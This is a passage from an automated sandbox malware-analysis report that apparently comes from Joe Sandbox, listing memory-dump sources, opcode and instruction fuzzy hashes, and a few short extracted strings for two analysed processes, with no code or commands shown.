                                                                                              • Opcode Fuzzy Hash: 53b31261736bc3e13d0a97e7cf8cc6962515534609263abfafec05edcb1b745f
                                                                                              • Instruction Fuzzy Hash: 6A31E332A0DA1E4FEB78EB5CD8A56E977A1EFA4320F05037BE40DC7295CD646D458B80
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000038.00000002.2889938688.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_56_2_7ffd9bab0000_nFQRHbQjcuhfqIAubZpdQD.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 278e1aff697bfaf3409bd749c734d420c3c3234245bf37f2cee5ac567be37c75
                                                                                              • Instruction ID: 10243c08ddcef41311153d9444a03a2acabf818691e635381caa8935d6e41a50
                                                                                              • Opcode Fuzzy Hash: 278e1aff697bfaf3409bd749c734d420c3c3234245bf37f2cee5ac567be37c75
                                                                                              • Instruction Fuzzy Hash: F2214721B1D92D0FE7A8BB6C946A67977C6DF99322F1101B9E41EC32E6DC14AC414680
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000038.00000002.2889938688.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_56_2_7ffd9bab0000_nFQRHbQjcuhfqIAubZpdQD.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 5e6ae0e08b0aab3b3e6100d735bbf220d3b9ef551be036fbf51c9dfe251f1d55
                                                                                              • Instruction ID: 98404d05df177de13ee76532b42fc2912d33d060ef83df82beac9ec210d9bab9
                                                                                              • Opcode Fuzzy Hash: 5e6ae0e08b0aab3b3e6100d735bbf220d3b9ef551be036fbf51c9dfe251f1d55
                                                                                              • Instruction Fuzzy Hash: 7831B831A0955E8FDB55EB68C8649FD7BF0FF65300F0545BBD019D72A2DE64A540CB40
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000038.00000002.2889938688.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_56_2_7ffd9bab0000_nFQRHbQjcuhfqIAubZpdQD.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: a5b1f07fe85f07d6ffc945aee4f5f2e051beb05fa5f4816fdb8b1fe72e65a7f6
                                                                                              • Instruction ID: 1c853d29c00e7c20e28e589944a7e8f71a7ed769cca73ec82842aa635635c9c5
                                                                                              • Opcode Fuzzy Hash: a5b1f07fe85f07d6ffc945aee4f5f2e051beb05fa5f4816fdb8b1fe72e65a7f6
                                                                                              • Instruction Fuzzy Hash: 1A213832B0D25D8BE732E7A89C210EC7B60EF52325F0546F3D1588B1D3D9386646CB85
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000038.00000002.2889938688.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_56_2_7ffd9bae1000_nFQRHbQjcuhfqIAubZpdQD.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 34e7b029da2e2b4c3699f9e4d36801ba433a9b9e0a10247a302241ff8fa07704
                                                                                              • Instruction ID: bffeadf2777bbbf7804147e252e5ac9e823c19c8af6c78f9d4aa0033985d61cd
                                                                                              • Opcode Fuzzy Hash: 34e7b029da2e2b4c3699f9e4d36801ba433a9b9e0a10247a302241ff8fa07704
                                                                                              • Instruction Fuzzy Hash: 69219232F0851E8BEB64DB58D8547FE73A2EB94311F018176E019E7294CE796E458BD0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000038.00000002.2889938688.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_56_2_7ffd9bab0000_nFQRHbQjcuhfqIAubZpdQD.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 5185e1682075a9f4fa3e19575551a986d4698eeb929d82880fb883d62398dbea
                                                                                              • Instruction ID: 46f7fc3e1612a091fc3f7baddf75177c6609f7ee83276fb3acdf8c43f65ec3f5
                                                                                              • Opcode Fuzzy Hash: 5185e1682075a9f4fa3e19575551a986d4698eeb929d82880fb883d62398dbea
                                                                                              • Instruction Fuzzy Hash: FF21A721F1E92D4BEBB4E76884746B822D2EF94710F5642B5D02DC31F2EDA8AE418F04
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000038.00000002.2889938688.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_56_2_7ffd9bac0000_nFQRHbQjcuhfqIAubZpdQD.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 1b0fa55a80a94e6199b15b73fc852ebade73f5563501e2ce2b60a898e85efb15
                                                                                              • Instruction ID: 198baa8724d623cae288c706a534e405d0a78626ac3823ff50b4c0ac72162380
                                                                                              • Opcode Fuzzy Hash: 1b0fa55a80a94e6199b15b73fc852ebade73f5563501e2ce2b60a898e85efb15
                                                                                              • Instruction Fuzzy Hash: 03110631A0D61D4FEB74EF5498506BA76A1EB85310F12417ED44AC32A6DD78590687D0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000038.00000002.2889938688.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_56_2_7ffd9bab0000_nFQRHbQjcuhfqIAubZpdQD.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 9ec3740fc15716e45fac98fc82db05b4a0d5f544c3cf84d7ffacee3cfff92c19
                                                                                              • Instruction ID: 893e7a09ac4e9683ff9f4abe5faa7138306f7a145d9a7a9cc53d5747be19237d
                                                                                              • Opcode Fuzzy Hash: 9ec3740fc15716e45fac98fc82db05b4a0d5f544c3cf84d7ffacee3cfff92c19
                                                                                              • Instruction Fuzzy Hash: F101D631A0D29C8FE722EBA8C8601DD7FB0EF56310F1545F7D054DB2A2DA3456458B84
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000038.00000002.2889938688.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_56_2_7ffd9bab0000_nFQRHbQjcuhfqIAubZpdQD.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: f69cf9ef9d6e6e3ffd33871f457040ea0de6d1b94b19d5afc1e0695df10e6a27
                                                                                              • Instruction ID: 7c1fe6a08f168c37a26143d939a15c3af75ba8df45ef4fd44647cc996cb5138d
                                                                                              • Opcode Fuzzy Hash: f69cf9ef9d6e6e3ffd33871f457040ea0de6d1b94b19d5afc1e0695df10e6a27
                                                                                              • Instruction Fuzzy Hash: 9401B131A0E28C8FE722EBA8C8601DC7FB0EF56310F1541E7D054DB2A2EA346644CB80
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000038.00000002.2889938688.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_56_2_7ffd9bab0000_nFQRHbQjcuhfqIAubZpdQD.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • Instruction Fuzzy Hash: E8C08C3051180C8FC908EB28C88480433A0FB09300BC20090E009C7270E65ADDC2CB40
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000038.00000002.2889938688.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_56_2_7ffd9bac0000_nFQRHbQjcuhfqIAubZpdQD.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 3a94d5982387b57a133a12997876bda7df39e37f70f18a2077d23d642e577c25
                                                                                              • Instruction ID: 8fe7887295c5b5ffaec6f3abcc4684739fe732c2edc0758e506b00f2a400de5e
                                                                                              • Opcode Fuzzy Hash: 3a94d5982387b57a133a12997876bda7df39e37f70f18a2077d23d642e577c25
                                                                                              • Instruction Fuzzy Hash: D4D0C930D045298FDBA0EB5488917A876B1AF48310F5001F6800CE3285CE356D80DB51
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000038.00000002.2889938688.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_56_2_7ffd9bab0000_nFQRHbQjcuhfqIAubZpdQD.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 73f9df46521dc5d9b38235658b75fdd496f8a23a7d2725a714683a5f0d8331b5
                                                                                              • Instruction ID: 03d477ccb4175055202313fbebcd53292deebeac5553f9cd479d896b3342e71a
                                                                                              • Opcode Fuzzy Hash: 73f9df46521dc5d9b38235658b75fdd496f8a23a7d2725a714683a5f0d8331b5
                                                                                              • Instruction Fuzzy Hash: 97C08CA1E2822945E37486A0482A1AA73818F01220F6286B2806DA70A1EE6896426A80
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000038.00000002.2889938688.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_56_2_7ffd9bab0000_nFQRHbQjcuhfqIAubZpdQD.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: d8e3dd90adc7a7bd89bbdb057cdeb953dd505ec69db4469dc38f7dcee209e240
                                                                                              • Instruction ID: 08665333b9085a4f1aed96d45f04d0e13d56d9190c4b13bbcc5372a398322bec
                                                                                              • Opcode Fuzzy Hash: d8e3dd90adc7a7bd89bbdb057cdeb953dd505ec69db4469dc38f7dcee209e240
                                                                                              • Instruction Fuzzy Hash: AAC04C01F2882A07F399661844315BE08835F54769F5546B8E01ECB6DECD5C5A621BC7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000038.00000002.2889938688.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_56_2_7ffd9bab0000_nFQRHbQjcuhfqIAubZpdQD.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 709359157962c98cd0ecdf05242bc1fd9eaca1de47418e54626fafadeef44463
                                                                                              • Instruction ID: 3c7e3ebd94f208d2fcbfa463022b6d09dde85837b0625a7963d51f888e9b4b46
                                                                                              • Opcode Fuzzy Hash: 709359157962c98cd0ecdf05242bc1fd9eaca1de47418e54626fafadeef44463
                                                                                              • Instruction Fuzzy Hash: E9B01200E5741F00E43433FB08B20A870409B44100FC20070D41D8009198DD16940646
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000038.00000002.2889938688.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_56_2_7ffd9bab0000_nFQRHbQjcuhfqIAubZpdQD.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: c9$!k9$"s9$#{9
                                                                                              • API String ID: 0-1692736845
                                                                                              • Opcode ID: 64295ce63d89b9c75ab817259eb6315a6be831e1ddee33239c49bc918e967d57
                                                                                              • Instruction ID: ee0e26a1e1c57ffd8ab351f7d2016590dd2b112039a0fad7042e754bedb5fd9d
                                                                                              • Opcode Fuzzy Hash: 64295ce63d89b9c75ab817259eb6315a6be831e1ddee33239c49bc918e967d57
                                                                                              • Instruction Fuzzy Hash: DB41AE07B0953646E23973FD78229ED5B848FA927FB0847B7F56E8D0D74C486081C2E9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000039.00000002.3037888777.00007FFD9BAE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_57_2_7ffd9bae0000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 74fe736cc652e0d3423dcd026ed316de8c1524f82fede36c67e5679deda8c8e9
                                                                                              • Instruction ID: 369026df5ab6341964dbaeb2816e708beac86ec19edf2bdc6fbabbb0855af056
                                                                                              • Opcode Fuzzy Hash: 74fe736cc652e0d3423dcd026ed316de8c1524f82fede36c67e5679deda8c8e9
                                                                                              • Instruction Fuzzy Hash: 1EC2B331B1991E4FEBA8EB5884A1AB873D2FFA8350F0542B9D01DC72D7DD68AD418781
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000039.00000002.3037888777.00007FFD9BB01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB01000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_57_2_7ffd9bb01000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: b5c3d35d984437ce1bc6d3cddcc3e668dae44c3eb67e690c45d144b4ddbfd214
                                                                                              • Instruction ID: be485565a8a165dcd51c330d823bc9851601e97c8507e311e1d5b29538752261
                                                                                              • Opcode Fuzzy Hash: b5c3d35d984437ce1bc6d3cddcc3e668dae44c3eb67e690c45d144b4ddbfd214
                                                                                              • Instruction Fuzzy Hash: 8EB17C21B6D79A0BE32D8A6C48920B573C1FB9330DB15877DE8DBC359BD928E50786C1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000039.00000002.3037888777.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_57_2_7ffd9bad0000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: b64a4818c29080e439505db85a973e26cd9aa43b45af74a1be8c34fbeecfe78f
                                                                                              • Instruction ID: d004bf825a64333a87d76a5a227fffb6d4faa991b51f384a6558d82e0f8dd3af
                                                                                              • Opcode Fuzzy Hash: b64a4818c29080e439505db85a973e26cd9aa43b45af74a1be8c34fbeecfe78f
                                                                                              • Instruction Fuzzy Hash: 9E91C172A19A8D4FE799DB6888657A97FE0FF99714F0002BED04DC72E6CBB81405C741
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000039.00000002.3037888777.00007FFD9BAF3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF3000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_57_2_7ffd9baf3000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: [
                                                                                              • API String ID: 0-784033777
                                                                                              • Opcode ID: 2e22b873c191d49c490a480e30419d343806f7026aeb5de892ad85ba87155204
                                                                                              • Instruction ID: bbf7a2260f85285b4908543e04c03b12b0e80d2114a3353d194ffcbe533aaa0c
                                                                                              • Opcode Fuzzy Hash: 2e22b873c191d49c490a480e30419d343806f7026aeb5de892ad85ba87155204
                                                                                              • Instruction Fuzzy Hash: F3119431A1CB588FDB64DF18C4456AABBE1FB98711F12053ED489E3270CB74B9418B83
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000039.00000002.3037888777.00007FFD9BB01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB01000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_57_2_7ffd9bb01000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: M
                                                                                              • API String ID: 0-3664761504
                                                                                              • Opcode ID: bfbefb590432468084fd49266a04cd45f1a3350012849f0dde65ead55788496e
                                                                                              • Instruction ID: 9d4c664d71cd1ef77a1365299136f9f7734d95e4671a2bb8773e28da2f205024
                                                                                              • Opcode Fuzzy Hash: bfbefb590432468084fd49266a04cd45f1a3350012849f0dde65ead55788496e
                                                                                              • Instruction Fuzzy Hash: 9D11BF2150F3C54FDB57977488289A97FA0AF43615B0A81EEE0C5CF0F3DA69494AC712
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000039.00000002.3037888777.00007FFD9BB01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB01000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_57_2_7ffd9bb01000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: C7
                                                                                              • API String ID: 0-2279091541
                                                                                              • Opcode ID: b5219737a51c0bb0ea60b40a091dddaf5cff3d128efa6edc09942b153dd09312
                                                                                              • Instruction ID: 0eb7c3f59ac615d02c5e0b99a616d93979dbde950ce93ab4f8c887cdbe014959
                                                                                              • Opcode Fuzzy Hash: b5219737a51c0bb0ea60b40a091dddaf5cff3d128efa6edc09942b153dd09312
                                                                                              • Instruction Fuzzy Hash: 86F0B421B0A90E4FE6A8E75848EA7B862C2FF98319F054076E04CC72E7DE2869814341
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000039.00000002.3037888777.00007FFD9BB01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB01000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_57_2_7ffd9bb01000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: M
                                                                                              • API String ID: 0-3664761504
                                                                                              • Opcode ID: f64fda5e2a283c5a6f20f5bc460977e2c33a95fab3921efa84f9000537be349d
                                                                                              • Instruction ID: afbd80f9ef0ad0fad0cf1b735c2b400d77d19183b0cef39e93db4313243bea19
                                                                                              • Opcode Fuzzy Hash: f64fda5e2a283c5a6f20f5bc460977e2c33a95fab3921efa84f9000537be349d
                                                                                              • Instruction Fuzzy Hash: 1FE06D6164E7C84FC71AEA748869554BFA0EF6721174A42EFC085CF5A7EA2D8885C701
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000039.00000002.3037888777.00007FFD9BB01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB01000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_57_2_7ffd9bb01000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: M
                                                                                              • API String ID: 0-3664761504
                                                                                              • Opcode ID: 6164b1069710f8b3b52f48148b439a8276ab5531142d88090189c8fbc13049d9
                                                                                              • Instruction ID: 3d62a0c47176d44997c82c0e1f821f8ab33fecd675541abfaf393db1c4301b03
                                                                                              • Opcode Fuzzy Hash: 6164b1069710f8b3b52f48148b439a8276ab5531142d88090189c8fbc13049d9
                                                                                              • Instruction Fuzzy Hash: F8E06D6164E7C44FCB1AEA758869454BFA0EF6720174A52EEC085CF5A7EA2D8889C701
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000039.00000002.3037888777.00007FFD9BB01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB01000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_57_2_7ffd9bb01000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: M
                                                                                              • API String ID: 0-3664761504
                                                                                              • Opcode ID: 1180c0164a1678c14bbd07de09373b86f6d47de75d9a1041d2375b4828baaeea
                                                                                              • Instruction ID: 89b5110806269fea2bc7528639372eea444baea11129436563572e6916387cf4
                                                                                              • Opcode Fuzzy Hash: 1180c0164a1678c14bbd07de09373b86f6d47de75d9a1041d2375b4828baaeea
                                                                                              • Instruction Fuzzy Hash: 81E09271A0E3C44FC71AEB3488688547F60EE6B21134A42EFC045CF2A7EA2DCC85C701
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000039.00000002.3037888777.00007FFD9BAF3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF3000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_57_2_7ffd9baf3000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: M
                                                                                              • API String ID: 0-3664761504
                                                                                              • Opcode ID: 54c471381a3eb1387d9f847047a2259f9ccba084ab570ea0abc02eeeae4831dc
                                                                                              • Instruction ID: 562fea6da422dd0b0147829fc312ee4a392a0f6b7824ed0102470070d6831f05
                                                                                              • Opcode Fuzzy Hash: 54c471381a3eb1387d9f847047a2259f9ccba084ab570ea0abc02eeeae4831dc
                                                                                              • Instruction Fuzzy Hash: 40E0923060A3C14FCB1AAB748468855BF70EF6720174A42EEC046CF1A3EB2DC886CB01
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 7aed316ceae474d060d593c01cb7df5676e94ae54d34ac94682119992c5ea024
                                                                                              • Instruction ID: a0010583900a89edfd703a8e1159066a4fda408acd39631b023e0bab7e7315c7
                                                                                              • Opcode Fuzzy Hash: 7aed316ceae474d060d593c01cb7df5676e94ae54d34ac94682119992c5ea024
                                                                                              • Instruction Fuzzy Hash: AEE09220B197C44FCB0B9A3C48685607FA1EF571057C952EAC046CB1A3E918DC85C742
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000039.00000002.3037888777.00007FFD9BB01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB01000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_57_2_7ffd9bb01000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: f707c1c7700c84bdc2fa7b8863d9dbcc75505be42f67ee76dfe9e5e855e5aea7
                                                                                              • Instruction ID: 343ba5e9e9bb1c9d1940badee7ff9fc5afa3bfd3d09b69df29b991ca14f1d62e
                                                                                              • Opcode Fuzzy Hash: f707c1c7700c84bdc2fa7b8863d9dbcc75505be42f67ee76dfe9e5e855e5aea7
                                                                                              • Instruction Fuzzy Hash: 32E02223F0E6884FE31A0A384C748B43B609F3B22A34F00A7D08ACB6F7D8059D098302
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000039.00000002.3037888777.00007FFD9BAE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_57_2_7ffd9bae0000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: b192a0ea98191691627029555fcad640ac7b7929dd5969e9070bacc8d67befd9
                                                                                              • Instruction ID: 74504d41f0c349d0026d981228a019bde562e82af99a2e846a28dea045a01348
                                                                                              • Opcode Fuzzy Hash: b192a0ea98191691627029555fcad640ac7b7929dd5969e9070bacc8d67befd9
                                                                                              • Instruction Fuzzy Hash: E1F08271E0855E8BEB15EB84C865ABD73E2FB50700F010679D426AB2E8DEB469018B80
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000039.00000002.3037888777.00007FFD9BB01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB01000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_57_2_7ffd9bb01000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 525ae91c99862d75867d9db26404daaa026ecb39af5735a8a8152f1b7fb19109
                                                                                              • Instruction ID: 2801a0626bf49da33327d900b299ad47e65a3a1cbe7daae0b93aa7b69d7b4c61
                                                                                              • Opcode Fuzzy Hash: 525ae91c99862d75867d9db26404daaa026ecb39af5735a8a8152f1b7fb19109
                                                                                              • Instruction Fuzzy Hash: 64E04F20A4D7C44FCB0AAB3888695503FA0DF6B215B8A01DAC045CB1B3D51DDC49C711
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000039.00000002.3037888777.00007FFD9BAF3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF3000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_57_2_7ffd9baf3000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 3d9f8be3ba615e18499f3b8e9abe0a8b87aeeb0acf764803db3cd1d473a39dbc
                                                                                              • Instruction ID: 54494d4839a1049948f64c419503b0db34feda57208a74932c42a1364c45b394
                                                                                              • Opcode Fuzzy Hash: 3d9f8be3ba615e18499f3b8e9abe0a8b87aeeb0acf764803db3cd1d473a39dbc
                                                                                              • Instruction Fuzzy Hash: 33E01A20A497844FCB0AAA3888695503FB1DF6B215B8A00D6C045CB1B3D51DD849C751
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000039.00000002.3037888777.00007FFD9BAE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_57_2_7ffd9bae0000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: c0186bf66b95d362cb25a69d1c9eaecfc839f880f9ecefc7387d894ca53d3705
                                                                                              • Instruction ID: 76b4888e6025a938afe51861bed46b7babfd62e827d48f24d27dbce629313bbb
                                                                                              • Opcode Fuzzy Hash: c0186bf66b95d362cb25a69d1c9eaecfc839f880f9ecefc7387d894ca53d3705
                                                                                              • Instruction Fuzzy Hash: 20E04F3270DC0E46FB75A75088705BF3696EBD0319B130339C02EC21B1DEBCA7028641
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000039.00000002.3037888777.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_57_2_7ffd9bad0000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: d2ed5f6ef24528162e0c5d6d0b4e6acd4a191941b34513d960a86b17f11536ae
                                                                                              • Instruction ID: 70bf9138aeabc9d01bde8c9b316622cc13308fdc46d7648e26cb3aefa60624d4
                                                                                              • Opcode Fuzzy Hash: d2ed5f6ef24528162e0c5d6d0b4e6acd4a191941b34513d960a86b17f11536ae
                                                                                              • Instruction Fuzzy Hash: D5F02270518A1C8FCF98DB08C495EE9B7F1FB68305F114199914AE7260CB31AA80CF85
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000039.00000002.3037888777.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_57_2_7ffd9bad0000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: b4de9ccdc03301b4f8b34275fbf37b0f750ec48e4bf8e95f9c956194bf01efe9
                                                                                              • Instruction ID: 80f32f3af981112524dfa9caf3547bb5af2cc3d6dc48dfb79d6b70ebd687c03b
                                                                                              • Opcode Fuzzy Hash: b4de9ccdc03301b4f8b34275fbf37b0f750ec48e4bf8e95f9c956194bf01efe9
                                                                                              • Instruction Fuzzy Hash: 4DE01230F0D11A46FBB49754D8617F962B0EBD4300F1121B8D50E933D1DD78AF81CA49
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000039.00000002.3037888777.00007FFD9BB01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB01000, based on PE: false
